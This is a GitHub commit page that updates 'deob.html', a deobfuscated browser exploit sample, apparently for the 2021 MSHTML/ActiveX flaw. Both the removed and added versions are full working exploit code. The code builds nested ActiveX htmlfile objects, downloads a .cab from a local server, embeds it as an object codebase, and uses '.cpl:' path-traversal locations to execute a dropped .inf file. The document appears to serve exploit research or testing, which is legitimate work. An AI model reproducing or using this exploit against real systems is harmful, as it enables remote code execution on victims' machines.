Skip to content

Commit

Permalink
Working deob.html
Browse files Browse the repository at this point in the history 
Fixed the deobfuscated html file from the original sample.
  • Loading branch information
@prcabral
prcabral authored Sep 11, 2021
1 parent 77e5c08 commit 44308a5
Showing 1 changed file with 68 additions and 79 deletions.
147 changes: 68 additions & 79 deletions srv/deob.html
View file
Original file line number Diff line number Diff line change
@@ -1,81 +1,70 @@
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
<script>
function exploit() {

var x = window["document"];
var then = window["Document"]["prototype"]["createElement"];
var _0x4d7c02 = window["Document"]["prototype"]["write"];
var PL$22 = window["HTMLElement"]["prototype"]["appendChild"];
var opfilter = window["HTMLElement"]["prototype"]["removeChild"];
var range = then["call"](x, "iframe");
try {
PL$22["call"](x["body"], range);
} catch (errx) {
PL$22["call"](x["documentElement"], range);
}
var ACTIVEX = range["contentWindow"]["ActiveXObject"];
var view = new ACTIVEX("htmlfile");
range["contentDocument"]["open"]()["close"]();

try {
opfilter["call"](x["body"], range);
} catch (err) {
opfilter["call"](x["documentElement"], range);
}

view["open"]()["close"]();
var mappedObj = new (view["Script"]["ActiveXObject"])("htmlFile");
mappedObj["open"]()["close"]();
var TokenType = new (mappedObj["Script"]["ActiveXObject"])("htmlFile");
TokenType["open"]()["close"]();
var model = new (TokenType["Script"]["ActiveXObject"])("htmlFile");
model["open"]()["close"]();
var iedom = new ActiveXObject("htmlfile");
var rp_test = new ActiveXObject("htmlfile");
var wmp_test = new ActiveXObject("htmlfile");
var doc = new ActiveXObject("htmlfile");
var a = new ActiveXObject("htmlfile");
var fake = new ActiveXObject("htmlfile");
var errors = window["XMLHttpRequest"];
var $node = new errors;
var directiveProcessors = errors["prototype"]["open"];
var nodeTypeRender = errors["prototype"]["send"];
var newAttributes = window["setTimeout"];
directiveProcessors["call"]($node, "GET", "http://127.0.0.1/test.cab", ![]);
nodeTypeRender["call"]($node);

model["Script"]["document"]["write"]("<body>");
var PL$41 = then["call"](model["Script"]["document"], "object");
PL$41["setAttribute"]("codebase", "http://127.0.0.1/test.cab#version=5,0,0,0");
PL$41["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
PL$22["call"](model["Script"]["document"]["body"], PL$41);
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/Low/championship.inf";
rp_test["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/championship.inf";
wmp_test["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/Low/championship.inf";
doc["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/championship.inf";
a["Script"]["location"] = ".cpl:../../../../../Temp/Low/championship.inf";
doc["Script"]["location"] = ".cpl:../../../../../Temp/championship.inf";
doc["Script"]["location"] = ".cpl:../../Low/championship.inf";
doc["Script"]["location"] = ".cpl:../../championship.inf";
}

exploit();

</script>
</body>
</html>
<head>
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
<script>
function garbage() {
return 'garbage';
}
(function exploit() {
var iframe = window["Document"]['prototype']['createElement']['call'](window["document"], 'iframe');
try {
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['body'], iframe);
} catch (_0x1ab454) {
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['documentElement'], iframe);
}
var htmlfile = iframe['contentWindow']['ActiveXObject']
, htmlfile2 = new htmlfile('htmlfile');
iframe['contentDocument']['open']()['close']();
try {
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['body'], iframe);
} catch (_0x3b004e) {
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['documentElement'], iframe);
}
htmlfile2['open']()['close']();
var htmlfile3 = new htmlfile2[('Script')]['ActiveXObject']('htmlfile');
htmlfile3['open']()['close']();
var htmlfile4 = new htmlfile3[('Script')]['ActiveXObject']('htmlfile');
htmlfile4['open']()['close']();
var htmlfile5 = new htmlfile4[('Script')]['ActiveXObject']('htmlfile');
htmlfile5['open']()['close']();
var ActiveXObjectVAR = new ActiveXObject('htmlfile')
, ActiveXObjectVAR2 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR3 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR4 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR5 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR6 = new ActiveXObject('htmlfile')
, XMLHttpR = new window['XMLHttpRequest']()
, XMLHttpRopen = window['XMLHttpRequest']['prototype']['open']
, XMLHttpRsend = window['XMLHttpRequest']['prototype']['send'];
XMLHttpRopen['call'](XMLHttpR, 'GET', 'http://127.0.0.1/test.cab', ![]),
XMLHttpRsend['call'](XMLHttpR),
htmlfile5['Script']['document']['write']('body>');
var htmlScript = window["Document"]['prototype']['createElement']['call'](htmlfile5['Script']['document'], 'object');
htmlScript['setAttribute']('codebase', 'http://127.0.0.1/test.cab#version=5,0,0,0');
htmlScript['setAttribute']('CLSID:edbc374c-5730-432a-b5b8-de94f0b57217'),
window["HTMLElement"]["prototype"]["appendChild"]['call'](htmlfile5['Script']['document']['body'], htmlScript),
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:123',
ActiveXObjectVAR['Script']['location'] = '.cpl:../../../AppData/Local/Temp/Low/championship.inf',
ActiveXObjectVAR2['Script']['location'] = '.cpl:../../../AppData/Local/Temp/championship.inf',
ActiveXObjectVAR3['Script']['location'] = '.cpl:../../../../AppData/Local/Temp/Low/championship.inf',
ActiveXObjectVAR4['Script']['location'] = '.cpl:../../../../AppData/Local/Temp/championship.inf',
ActiveXObjectVAR5['Script']['location'] = '.cpl:../../../../../Temp/Low/championship.inf',
ActiveXObjectVAR4['Script']['location'] = '.cpl:../../../../../Temp/championship.inf',
ActiveXObjectVAR4['Script']['location'] = '.cpl:../../Low/championship.inf',
ActiveXObjectVAR4['Script']['location'] = '.cpl:../../championship.inf';
}());
</script>
</body>
</html>

0 comments on commit 44308a5

Please sign in to comment.